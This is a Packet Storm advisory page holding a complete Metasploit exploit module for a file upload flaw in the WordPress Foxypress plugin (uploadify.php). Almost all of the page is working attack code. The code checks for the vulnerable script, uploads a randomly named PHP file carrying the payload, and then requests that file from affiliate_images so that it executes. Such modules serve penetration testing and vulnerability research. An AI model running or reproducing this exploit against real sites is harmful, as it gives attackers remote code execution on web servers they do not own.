WordPress Foxypress uploadify.php Arbitrary Code Execution

2015-03-24T00:00:00
ID PACKETSTORM:130998
Type packetstorm
Reporter patrick
Modified 2015-03-24T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::HTTP::Wordpress  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',  
'Description' => %q(  
This module exploits an arbitrary PHP code execution flaw in the WordPress  
blogging software plugin known as Foxypress. The vulnerability allows for arbitrary  
file upload and remote code execution via the uploadify.php script. The Foxypress  
plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.  
),  
'Author' =>  
[  
'Sammy FORGIT', # Vulnerability Discovery, PoC  
'patrick' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['EDB', '18991'],  
['OSVDB' '82652'],  
['BID', '53805'],  
['WPVDB', '6231']  
],  
'Privileged' => false,  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],  
'DisclosureDate' => 'Jun 05 2012',  
'DefaultTarget' => 0))  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')  
)  
  
return Exploit::CheckCode::Detected if res && res.code == 200  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
post_data = Rex::MIME::Message.new  
post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")  
  
print_status("#{peer} - Sending PHP payload")  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),  
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",  
'data' => post_data.to_s  
)  
  
if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/  
print_error("#{peer} - File wasn't uploaded, aborting!")  
return  
end  
  
filename = "#{Regexp.last_match[1]}.php"  
  
print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")  
register_files_for_cleanup(filename)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)  
)  
  
print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200  
end  
end  
`